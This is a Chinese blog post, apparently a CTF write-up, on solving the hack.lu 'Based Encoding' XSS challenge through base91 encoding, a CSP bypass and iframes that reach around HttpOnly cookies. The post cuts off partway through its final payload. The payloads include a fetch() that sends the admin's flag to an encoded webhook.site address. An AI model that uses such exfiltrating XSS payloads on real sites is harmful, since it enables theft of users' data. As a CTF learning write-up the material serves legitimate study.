<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"><meta name="author" content="Squirt1e"><meta name="renderer" content="webkit"><meta name="copyright" content="Squirt1e"><meta name="keywords" content="Squirt1e's blog"><meta name="description" content="一名网络安全从业人员的博客"><meta name="Cache-Control" content="no-cache"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><title>记hack.lu两道XSS题 · Squirt1e's Blog</title><link rel="stylesheet" href="/css/style.css?v=2018.7.9"><link rel="stylesheet" href="/css/animation.css?v=2018.7.9"><link rel="icon" href="/img/assets/favicon.ico"><link rel="stylesheet" href="https://cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css?version=1.5.6"><!-- scripts--><script>(function( w ){
  "use strict";
  // rel=preload support test
  if( !w.loadCSS ){
    w.loadCSS = function(){};
  }
  // define on the loadCSS obj
  var rp = loadCSS.relpreload = {};
  // rel=preload feature support test
  // runs once and returns a function for compat purposes
  rp.support = (function(){
    var ret;
    try {
      ret = w.document.createElement( "link" ).relList.supports( "preload" );
    } catch (e) {
      ret = false;
    }
    return function(){
      return ret;
    };
  })();

  // if preload isn't supported, get an asynchronous load by using a non-matching media attribute
  // then change that media back to its intended value on load
  rp.bindMediaToggle = function( link ){
    // remember existing media attr for ultimate state, or default to 'all'
    var finalMedia = link.media || "all";

    function enableStylesheet(){
      link.media = finalMedia;
    }

    // bind load handlers to enable media
    if( link.addEventListener ){
      link.addEventListener( "load", enableStylesheet );
    } else if( link.attachEvent ){
      link.attachEvent( "onload", enableStylesheet );
    }

    // Set rel and non-applicable media type to start an async request
    // note: timeout allows this to happen async to let rendering continue in IE
    setTimeout(function(){
      link.rel = "stylesheet";
      link.media = "only x";
    });
    // also enable media after 3 seconds,
    // which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
    setTimeout( enableStylesheet, 3000 );
  };

  // loop through link elements in DOM
  rp.poly = function(){
    // double check this to prevent external calls from running
    if( rp.support() ){
      return;
    }
    var links = w.document.getElementsByTagName( "link" );
    for( var i = 0; i < links.length; i++ ){
      var link = links[ i ];
      // qualify links to those with rel=preload and as=style attrs
      if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
        // prevent rerunning on link
        link.setAttribute( "data-loadcss", true );
        // bind listeners to toggle media back
        rp.bindMediaToggle( link );
      }
    }
  };

  // if unsupported, run the polyfill
  if( !rp.support() ){
    // run once at least
    rp.poly();

    // rerun poly on an interval until onload
    var run = w.setInterval( rp.poly, 500 );
    if( w.addEventListener ){
      w.addEventListener( "load", function(){
        rp.poly();
        w.clearInterval( run );
      } );
    } else if( w.attachEvent ){
      w.attachEvent( "onload", function(){
        rp.poly();
        w.clearInterval( run );
      } );
    }
  }


  // commonjs
  if( typeof exports !== "undefined" ){
    exports.loadCSS = loadCSS;
  }
  else {
    w.loadCSS = loadCSS;
  }
}( typeof global !== "undefined" ? global : this ) );</script><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" defer></script><script src="/js/main.js?v=2018.7.9" defer></script><!-- fancybox--><link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'"><script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script><!-- busuanzi--><meta name="generator" content="Hexo 6.3.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head><body><section class="profile-close" id="cxo-profile"><div class="profile-avatar"><i class="fa fa-caret-left"></i><img src="/img/assets/avatar.jpg"></div><!--.profile-saying
  i.fa.fa-comment
  .saying--><div class="cxo-profile-inner"><div class="profile-name">Squirt1e</div><div class="profile-signature">for me</div><div class="friends"><div>FRIENDS</div><span><a href="http://114.67.236.137/pic/5634a4a770a0497be3f36bdc068c6f7.jpg" target="_black">美</a></span></div><div class="read-progress"></div></div></section><header id="cxo-intro" style="height: 70vh;background-image: url(/img/intro/index-bg.png);"><nav id="cxo-intro-nav"><section><div class="intro-nav-title"><a href="/">Squirt1e's Blog</a></div><div class="intro-nav-label-box"><a href="/">Home</a><a href="/about/">About</a><a href="/archives/">Archives</a><a href="/tags/">Tags</a></div><i class="fa fa-bars intro-nav-menu"><div class="intro-nav-drop"><a href="/">Home</a><a href="/about/">About</a><a href="/archives/">Archives</a><a href="/tags/">Tags</a></div></i><div class="clear"></div></section></nav><h1 class="post-title">记hack.lu两道XSS题</h1><div class="post-intros"><div class="post-intro-meta"><span class="post-intro-time"><i class="post-intro-calendar fa fa-calendar"></i><span>2023-10-31</span></span><span class="post-intro-tags"><a class="intro-tag fa fa-tag" href="javascript:void(0)" date-tags="CTF"> CTF</a><a class="intro-tag fa fa-tag" href="javascript:void(0)" date-tags="XSS"> XSS</a></span></div><div class="post-intro-read"><span> Word count: <span class="post-count">2.4k</span> | Reading time: <span class="post-count">11</span>min</span></div></div></header><article class="cxo-up" id="cxo-content-outer"><section id="cxo-content-inner"><article class="article-entry" id="post"><p>虽然都是签到题，但是都是签到题不太可能。</p>
<h4 id="Based-Encoding"><a href="#Based-Encoding" class="headerlink" title="Based Encoding"></a>Based Encoding</h4><p><code>note</code>题，最主要的路由就下面这三个。<code>/create</code>创建一个<code>note</code>，但是内容会被<code>base91</code>编码，这里纯粹是为了加难度而加难度。谁家<code>note</code>写完了会套一层编码，当谜语人吗？</p>
<p><code>encoding_id</code>是随机生成的，可以用这个<code>id</code>通过<code>/e/id</code>访问<code>note</code>。</p>
<p><code>/report</code>向<code>admin</code>举报一个<code>note</code>，<code>admin</code>会访问这个<code>note</code>，并且<code>flag</code>只有<code>admin</code>能访问。</p>
<p>这里进行了比较严格的限制，所以只能提交note id。</p>
<pre class="line-numbers language-python"><code class="language-python"><span class="token keyword">def</span> <span class="token function">init_db</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    db<span class="token punctuation">,</span> cur <span class="token operator">=</span> get_cursor<span class="token punctuation">(</span><span class="token punctuation">)</span>
    cur<span class="token punctuation">.</span>execute<span class="token punctuation">(</span><span class="token string">"CREATE TABLE IF NOT EXISTS accounts (id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT NOT NULL UNIQUE, password TEXT NOT NULL, admin INTEGER)"</span><span class="token punctuation">)</span>
    cur<span class="token punctuation">.</span>execute<span class="token punctuation">(</span><span class="token string">"INSERT INTO accounts (username, password, admin) VALUES ('admin', ?, 1)"</span><span class="token punctuation">,</span> <span class="token punctuation">[</span>admin_password<span class="token punctuation">]</span><span class="token punctuation">)</span>
    cur<span class="token punctuation">.</span>execute<span class="token punctuation">(</span><span class="token string">"CREATE TABLE IF NOT EXISTS encodings (id TEXT NOT NULL UNIQUE, text TEXT NOT NULL, creator, expires INTEGER DEFAULT 0)"</span><span class="token punctuation">)</span>
    cur<span class="token punctuation">.</span>execute<span class="token punctuation">(</span><span class="token string">"INSERT INTO encodings (id, text, creator, expires) VALUES (?, ?, 'admin', 0)"</span><span class="token punctuation">,</span> <span class="token punctuation">[</span>secrets<span class="token punctuation">.</span>token_hex<span class="token punctuation">(</span><span class="token number">20</span><span class="token punctuation">)</span><span class="token punctuation">,</span> FLAG<span class="token punctuation">]</span><span class="token punctuation">)</span>
    db<span class="token punctuation">.</span>commit<span class="token punctuation">(</span><span class="token punctuation">)</span>
    db<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token operator">//</span>
@app<span class="token punctuation">.</span>route<span class="token punctuation">(</span><span class="token string">"/create"</span><span class="token punctuation">,</span> methods<span class="token operator">=</span><span class="token punctuation">[</span><span class="token string">"GET"</span><span class="token punctuation">,</span> <span class="token string">"POST"</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
<span class="token keyword">def</span> <span class="token function">create</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">if</span> <span class="token operator">not</span> session<span class="token punctuation">:</span>
        flash<span class="token punctuation">(</span><span class="token string">"Please log in"</span><span class="token punctuation">)</span>
        <span class="token keyword">return</span> redirect<span class="token punctuation">(</span><span class="token string">"/login"</span><span class="token punctuation">)</span>
    <span class="token keyword">if</span> request<span class="token punctuation">.</span>method <span class="token operator">==</span> <span class="token string">"GET"</span><span class="token punctuation">:</span>
        <span class="token keyword">return</span> render_template<span class="token punctuation">(</span><span class="token string">"create.html"</span><span class="token punctuation">,</span> logged_out<span class="token operator">=</span><span class="token boolean">False</span><span class="token punctuation">)</span>
    <span class="token keyword">elif</span> request<span class="token punctuation">.</span>method <span class="token operator">==</span> <span class="token string">"POST"</span><span class="token punctuation">:</span>
        <span class="token keyword">if</span> <span class="token operator">not</span> request<span class="token punctuation">.</span>form<span class="token punctuation">[</span><span class="token string">"text"</span><span class="token punctuation">]</span><span class="token punctuation">:</span>
            <span class="token keyword">return</span> <span class="token string">"Missing text"</span>
        text <span class="token operator">=</span> request<span class="token punctuation">.</span>form<span class="token punctuation">[</span><span class="token string">"text"</span><span class="token punctuation">]</span>
        <span class="token keyword">if</span> len<span class="token punctuation">(</span>text<span class="token punctuation">)</span> <span class="token operator">></span> <span class="token number">1000</span><span class="token punctuation">:</span>
            flash<span class="token punctuation">(</span><span class="token string">"Too long!"</span><span class="token punctuation">)</span>
            <span class="token keyword">return</span> redirect<span class="token punctuation">(</span><span class="token string">"/create"</span><span class="token punctuation">)</span>
        encoded <span class="token operator">=</span> based91<span class="token punctuation">.</span>encode<span class="token punctuation">(</span>text<span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token keyword">if</span> <span class="token operator">not</span> <span class="token punctuation">(</span>re<span class="token punctuation">.</span>match<span class="token punctuation">(</span>r<span class="token string">"^[a-f0-9]+$"</span><span class="token punctuation">,</span> text<span class="token punctuation">)</span> <span class="token operator">and</span> len<span class="token punctuation">(</span>text<span class="token punctuation">)</span> <span class="token operator">%</span> <span class="token number">2</span> <span class="token operator">==</span> <span class="token number">0</span><span class="token punctuation">)</span> <span class="token keyword">else</span> bytes<span class="token punctuation">.</span>fromhex<span class="token punctuation">(</span>text<span class="token punctuation">)</span><span class="token punctuation">)</span>
        encoding_id <span class="token operator">=</span> create_encoding<span class="token punctuation">(</span>session<span class="token punctuation">[</span><span class="token string">"username"</span><span class="token punctuation">]</span><span class="token punctuation">,</span> encoded<span class="token punctuation">)</span>
        
        <span class="token keyword">return</span> redirect<span class="token punctuation">(</span>f<span class="token string">"/e/{encoding_id}"</span><span class="token punctuation">)</span>
@app<span class="token punctuation">.</span>route<span class="token punctuation">(</span><span class="token string">"/e/&lt;encoding_id>"</span><span class="token punctuation">)</span>
<span class="token keyword">def</span> <span class="token function">getEncoding</span><span class="token punctuation">(</span>encoding_id<span class="token punctuation">)</span><span class="token punctuation">:</span>
    logged_out <span class="token operator">=</span> session<span class="token punctuation">.</span>get<span class="token punctuation">(</span><span class="token string">"username"</span><span class="token punctuation">,</span> None<span class="token punctuation">)</span> <span class="token keyword">is</span> None
    encoding <span class="token operator">=</span> get_encoding<span class="token punctuation">(</span>encoding_id<span class="token punctuation">)</span>
    <span class="token keyword">return</span> render_template<span class="token punctuation">(</span><span class="token string">"view_encoding.html"</span><span class="token punctuation">,</span> encoding<span class="token operator">=</span>encoding<span class="token punctuation">,</span> logged_out<span class="token operator">=</span>logged_out<span class="token punctuation">)</span>
@app<span class="token punctuation">.</span>route<span class="token punctuation">(</span><span class="token string">"/report"</span><span class="token punctuation">,</span> methods<span class="token operator">=</span><span class="token punctuation">[</span><span class="token string">"GET"</span><span class="token punctuation">,</span> <span class="token string">"POST"</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
<span class="token keyword">def</span> <span class="token function">report</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">if</span> <span class="token operator">not</span> session<span class="token punctuation">:</span>
        flash<span class="token punctuation">(</span><span class="token string">"Please log in"</span><span class="token punctuation">)</span>
        <span class="token keyword">return</span> redirect<span class="token punctuation">(</span><span class="token string">"/login"</span><span class="token punctuation">)</span>
    <span class="token keyword">if</span> request<span class="token punctuation">.</span>method <span class="token operator">==</span> <span class="token string">"GET"</span><span class="token punctuation">:</span>
        <span class="token keyword">return</span> render_template<span class="token punctuation">(</span><span class="token string">"report.html"</span><span class="token punctuation">,</span> logged_out<span class="token operator">=</span><span class="token boolean">False</span><span class="token punctuation">)</span>

    value <span class="token operator">=</span> request<span class="token punctuation">.</span>form<span class="token punctuation">.</span>get<span class="token punctuation">(</span><span class="token string">"id"</span><span class="token punctuation">)</span>

    <span class="token keyword">if</span> <span class="token operator">not</span> value <span class="token operator">or</span> <span class="token operator">not</span> re<span class="token punctuation">.</span>match<span class="token punctuation">(</span>r<span class="token string">"^[a-f0-9]{40}$"</span><span class="token punctuation">,</span> value<span class="token punctuation">)</span><span class="token punctuation">:</span>
        flash<span class="token punctuation">(</span><span class="token string">"invalid value!"</span><span class="token punctuation">)</span>
        <span class="token keyword">return</span> render_template<span class="token punctuation">(</span><span class="token string">"report.html"</span><span class="token punctuation">,</span> logged_out<span class="token operator">=</span><span class="token boolean">False</span><span class="token punctuation">)</span>
    subprocess<span class="token punctuation">.</span>Popen<span class="token punctuation">(</span><span class="token punctuation">[</span><span class="token string">"timeout"</span><span class="token punctuation">,</span> <span class="token string">"-k"</span> <span class="token string">"15"</span><span class="token punctuation">,</span> <span class="token string">"15"</span><span class="token punctuation">,</span> <span class="token string">"node"</span><span class="token punctuation">,</span> <span class="token string">"adminbot.js"</span><span class="token punctuation">,</span> base_url<span class="token punctuation">,</span> admin_password<span class="token punctuation">,</span> value<span class="token punctuation">]</span><span class="token punctuation">,</span> shell<span class="token operator">=</span><span class="token boolean">False</span><span class="token punctuation">)</span>
    flash<span class="token punctuation">(</span><span class="token string">"An admin going there."</span><span class="token punctuation">)</span>
    <span class="token keyword">return</span> render_template<span class="token punctuation">(</span><span class="token string">"report.html"</span><span class="token punctuation">,</span> logged_out<span class="token operator">=</span><span class="token boolean">False</span><span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>思路很明显就是要通过<code>note</code>触发<code>xss</code>，然后举报给<code>admin</code>从而获取他的<code>cookie</code>之类的。</p>
<h5 id="step1-Lead-to-XSS"><a href="#step1-Lead-to-XSS" class="headerlink" title="step1 Lead to XSS"></a>step1 Lead to XSS</h5><p>&#x2F;e&#x2F;noteid这个路由通过<code>render_template</code>渲染<code>view_encoding.html</code>，而能导致<code>xss</code>的关键就在于：</p>
<pre><code>&lt;h2 class=&quot;subtitle&quot;&gt;&#123;&#123;encoding|safe&#125;&#125;&lt;/h2&gt;
</code></pre>
<p><code>safe</code>使得渲染的代码不进行转义直接输出在页面上，如果删掉这个<code>safe</code>渲染自动进行转义的话就没办法<code>xss</code>了。</p>
<p><img src="http://114.67.236.137/pic/1697517817188.png" alt="1697517817188"></p>
<p>这也是<code>ssti-&gt;xss</code>的一个小<code>trick</code>。<code>&#123;&#123;request.args.p|safe&#125;&#125;</code></p>
<p>如何让<code>base91</code>后的内容为：</p>
<pre><code>&lt;script&gt;alert(1)&lt;/script&gt;
</code></pre>
<p>其实只要调用<code>base91</code>的解码函数就可以实现了。</p>
<pre class="line-numbers language-python"><code class="language-python"><span class="token keyword">import</span> based91
<span class="token keyword">import</span> binascii
<span class="token keyword">import</span> re

<span class="token keyword">def</span> <span class="token function">timu</span><span class="token punctuation">(</span>text<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">if</span> <span class="token operator">not</span> <span class="token punctuation">(</span>re<span class="token punctuation">.</span>match<span class="token punctuation">(</span>r<span class="token string">"^[a-f0-9]+$"</span><span class="token punctuation">,</span> text<span class="token punctuation">)</span> <span class="token operator">and</span> len<span class="token punctuation">(</span>text<span class="token punctuation">)</span> <span class="token operator">%</span> <span class="token number">2</span> <span class="token operator">==</span> <span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
        result<span class="token operator">=</span>text<span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token keyword">else</span><span class="token punctuation">:</span>
        result<span class="token operator">=</span>bytes<span class="token punctuation">.</span>fromhex<span class="token punctuation">(</span>text<span class="token punctuation">)</span>
    encoded <span class="token operator">=</span> based91<span class="token punctuation">.</span>encode<span class="token punctuation">(</span>result<span class="token punctuation">)</span>
    <span class="token keyword">return</span> encoded
data <span class="token operator">=</span> based91<span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token string">"&lt;script>alert(1)&lt;/script>11"</span><span class="token punctuation">)</span>

hex_data <span class="token operator">=</span> binascii<span class="token punctuation">.</span>hexlify<span class="token punctuation">(</span>data<span class="token punctuation">)</span><span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"payload："</span><span class="token operator">+</span>hex_data<span class="token punctuation">)</span>

<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"base91编码后："</span><span class="token operator">+</span>timu<span class="token punctuation">(</span>hex_data<span class="token punctuation">)</span><span class="token punctuation">)</span>

payload：f0afecd5baf31dd4ce9eff0dc33f1a4405311458326b
base91编码后：<span class="token operator">&lt;</span>script<span class="token operator">></span>alert<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span><span class="token number">11</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>貌似由于编解码的问题导致生成的内容最后会有些失真，所以我最后加上了一些脏字符<code>11</code>。</p>
<p>使用生成的<code>payload</code>创建<code>note</code>即可<code>xss</code></p>
<p><img src="http://114.67.236.137/pic/1697518703324.png" alt="1697518703324"></p>
<h5 id="step2-bypass-base91-alphabet"><a href="#step2-bypass-base91-alphabet" class="headerlink" title="step2 bypass base91_alphabet"></a>step2 bypass base91_alphabet</h5><p>正当我以为拿下这个签到题的时候，我惊喜的发现<code>base91</code>字符表里没有<code>.</code>。而一般的<code>payload</code>都会用到点。</p>
<pre><code>base91_alphabet = [&#39;A&#39;, &#39;B&#39;, &#39;C&#39;, &#39;D&#39;, &#39;E&#39;, &#39;F&#39;, &#39;G&#39;, &#39;H&#39;, &#39;I&#39;, &#39;J&#39;, &#39;K&#39;, &#39;L&#39;, &#39;M&#39;,
    &#39;N&#39;, &#39;O&#39;, &#39;P&#39;, &#39;Q&#39;, &#39;R&#39;, &#39;S&#39;, &#39;T&#39;, &#39;U&#39;, &#39;V&#39;, &#39;W&#39;, &#39;X&#39;, &#39;Y&#39;, &#39;Z&#39;,
    &#39;a&#39;, &#39;b&#39;, &#39;c&#39;, &#39;d&#39;, &#39;e&#39;, &#39;f&#39;, &#39;g&#39;, &#39;h&#39;, &#39;i&#39;, &#39;j&#39;, &#39;k&#39;, &#39;l&#39;, &#39;m&#39;,
    &#39;n&#39;, &#39;o&#39;, &#39;p&#39;, &#39;q&#39;, &#39;r&#39;, &#39;s&#39;, &#39;t&#39;, &#39;u&#39;, &#39;v&#39;, &#39;w&#39;, &#39;x&#39;, &#39;y&#39;, &#39;z&#39;,
    &#39;0&#39;, &#39;1&#39;, &#39;2&#39;, &#39;3&#39;, &#39;4&#39;, &#39;5&#39;, &#39;6&#39;, &#39;7&#39;, &#39;8&#39;, &#39;9&#39;, &#39;!&#39;, &#39;#&#39;, &#39;$&#39;,
    &#39;%&#39;, &#39;€&#39;, &#39;(&#39;, &#39;)&#39;, &#39;*&#39;, &#39;+&#39;, &#39;,&#39;, &#39;°&#39;, &#39;/&#39;, &#39;:&#39;, &#39;;&#39;, &#39;&lt;&#39;, &#39;=&#39;,
    &#39;&gt;&#39;, &#39;?&#39;, &#39;@&#39;, &#39;[&#39;, &#39;]&#39;, &#39;^&#39;, &#39;_&#39;, &#39;`&#39;, &#39;&#123;&#39;, &#39;|&#39;, &#39;&#125;&#39;, &#39;~&#39;, &#39;&quot;&#39;]
</code></pre>
<p>本来想用<code>eval(String.fromCharCode())</code>。</p>
<p>但他设置了<code>unsafe-inline</code>，这是个非常宽松的限制，但是限制了<code>eval</code>，并且不能远程加载<code>js</code>。</p>
<pre class="line-numbers language-python"><code class="language-python">    response<span class="token punctuation">.</span>headers<span class="token punctuation">[</span><span class="token string">"Content-Security-Policy"</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token string">"script-src 'unsafe-inline';"</span>
    <span class="token keyword">return</span> response
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p><code>js</code>层面的绕过有self取属性绕过。</p>
<pre><code>document.location               &lt;===&gt;           self[&quot;document&quot;][&quot;location&quot;]
</code></pre>
<p>也不能用空格，标签中的属性空格可以用&#x2F;来代替，但实际利用中空格是用不到的。</p>
<h5 id="step3-bypass-http-only"><a href="#step3-bypass-http-only" class="headerlink" title="step3 bypass http only"></a>step3 bypass http only</h5><p>最常见的思路就是把管理员<code>cookie</code>偷出来。但由于<code>cookie</code>设置了<code>http only</code>，导致无法用<code>js</code>获取<code>cookie</code>。那么只能操控<code>admin</code>，让他先访问<code>/</code>路由获取第一个<code>noteid</code>（即<code>flag</code>的<code>noteid</code>），然后访问<code>/e/noteid</code>，取出来<code>flag</code>就行了。</p>
<p>这里选择操控两个<code>frame</code>，第一个<code>frame</code>访问根目录获取<code>noteid</code>，第二个<code>frame</code>访问<code>/e/noteid</code>获取<code>flag</code>，最后发给<code>dnslog</code>。</p>
<p>照着以上分析逻辑写就行了，通过<code>createElement</code>创建<code>frame</code>。需要调试的就是如何取<code>noteid</code>以及<code>flag</code>。这个可以自己创建个账号第一个<code>note</code>写个<code>testflag</code>来模拟测试。</p>
<p>过滤了<code>.</code>用<code>atob</code>函数解码一层即可绕过。</p>
<pre class="line-numbers language-js"><code class="language-js"><span class="token operator">&lt;</span>script<span class="token operator">></span>
    f1<span class="token operator">=</span>document<span class="token punctuation">.</span><span class="token function">createElement</span><span class="token punctuation">(</span><span class="token string">"iframe"</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">//第一个frame</span>
    f1<span class="token punctuation">.</span>src<span class="token operator">=</span><span class="token string">"/"</span><span class="token punctuation">;</span>
    f1<span class="token punctuation">.</span>onload<span class="token operator">=</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token operator">></span><span class="token punctuation">{</span>
        i<span class="token operator">=</span>f1<span class="token punctuation">.</span>contentWindow<span class="token punctuation">.</span>document<span class="token punctuation">.</span><span class="token function">getElementsByTagName</span><span class="token punctuation">(</span><span class="token string">"a"</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">4</span><span class="token punctuation">]</span><span class="token punctuation">.</span>text<span class="token punctuation">;</span> <span class="token comment" spellcheck="true">//获取第一个noteid，flag noteid</span>
        f2<span class="token operator">=</span>document<span class="token punctuation">.</span><span class="token function">createElement</span><span class="token punctuation">(</span><span class="token string">"iframe"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        f2<span class="token punctuation">.</span>src<span class="token operator">==</span><span class="token string">"/e/"</span><span class="token operator">+</span>i<span class="token punctuation">;</span>
        f2<span class="token punctuation">.</span>onload<span class="token operator">=</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token operator">></span><span class="token punctuation">{</span>
            f<span class="token operator">=</span>frame2<span class="token punctuation">.</span>contentWindow<span class="token punctuation">.</span>document<span class="token punctuation">.</span><span class="token function">getElementsByClassName</span><span class="token punctuation">(</span><span class="token string">"subtitle"</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">.</span>innerHTML<span class="token punctuation">;</span> <span class="token comment" spellcheck="true">//获取flag</span>
            <span class="token function">fetch</span><span class="token punctuation">(</span><span class="token function">atob</span><span class="token punctuation">(</span><span class="token string">"aHR0cHM6Ly93ZWJob29rLnNpdGUvZTU4ZWZmYTgtZDlkOS00OGEwLTk4ZjItMjJhOTYyOTYxYzIyLw=="</span><span class="token punctuation">)</span><span class="token operator">+</span>f<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span><span class="token punctuation">;</span>
        document<span class="token punctuation">.</span>body<span class="token punctuation">.</span><span class="token function">appendChild</span><span class="token punctuation">(</span>f2<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span><span class="token punctuation">;</span>
    document<span class="token punctuation">.</span>body<span class="token punctuation">.</span><span class="token function">appendChild</span><span class="token punctuation">(</span>f1<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>最后用<code>self</code>一个一个套上即可。</p>
<pre class="line-numbers language-python"><code class="language-python">data <span class="token operator">=</span> based91<span class="token punctuation">.</span>decode<span class="token punctuation">(</span>'<span class="token operator">&lt;</span>script<span class="token operator">></span>\
f1<span class="token operator">=</span>self<span class="token punctuation">[</span><span class="token string">"document"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"createElement"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"iframe"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>\
    self<span class="token punctuation">[</span><span class="token string">"f1"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"src"</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token string">"/"</span><span class="token punctuation">;</span>\
    self<span class="token punctuation">[</span><span class="token string">"f1"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"onload"</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token operator">></span><span class="token punctuation">{</span>\
        i<span class="token operator">=</span>self<span class="token punctuation">[</span><span class="token string">"f1"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"contentWindow"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"document"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"getElementsByTagName"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"a"</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">4</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"text"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>\
        f2<span class="token operator">=</span>self<span class="token punctuation">[</span><span class="token string">"document"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"createElement"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"iframe"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>\
        self<span class="token punctuation">[</span><span class="token string">"f2"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"src"</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token string">"/e/"</span><span class="token operator">+</span>i<span class="token punctuation">;</span>\
        self<span class="token punctuation">[</span><span class="token string">"f2"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"onload"</span><span class="token punctuation">]</span><span class="token operator">=</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token operator">=</span><span class="token operator">></span><span class="token punctuation">{</span>\
            f<span class="token operator">=</span>self<span class="token punctuation">[</span><span class="token string">"f2"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"contentWindow"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"document"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"getElementsByClassName"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"subtitle"</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"innerHTML"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>\
            fetch<span class="token punctuation">(</span>atob<span class="token punctuation">(</span><span class="token string">"aHR0cHM6Ly93ZWJob29rLnNpdGUvZTU4ZWZmYTgtZDlkOS00OGEwLTk4ZjItMjJhOTYyOTYxYzIyLw=="</span><span class="token punctuation">)</span><span class="token operator">+</span>f<span class="token punctuation">)</span><span class="token punctuation">;</span>\
        <span class="token punctuation">}</span><span class="token punctuation">;</span>\
        self<span class="token punctuation">[</span><span class="token string">"document"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"body"</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"appendChild"</span><span class="token punctuation">]</span><span class="token punctuation">(</span>f2<span class="token punctuation">)</span><span class="token punctuation">;</span>\
    <span class="token punctuation">}</span><span class="token punctuation">;</span>\
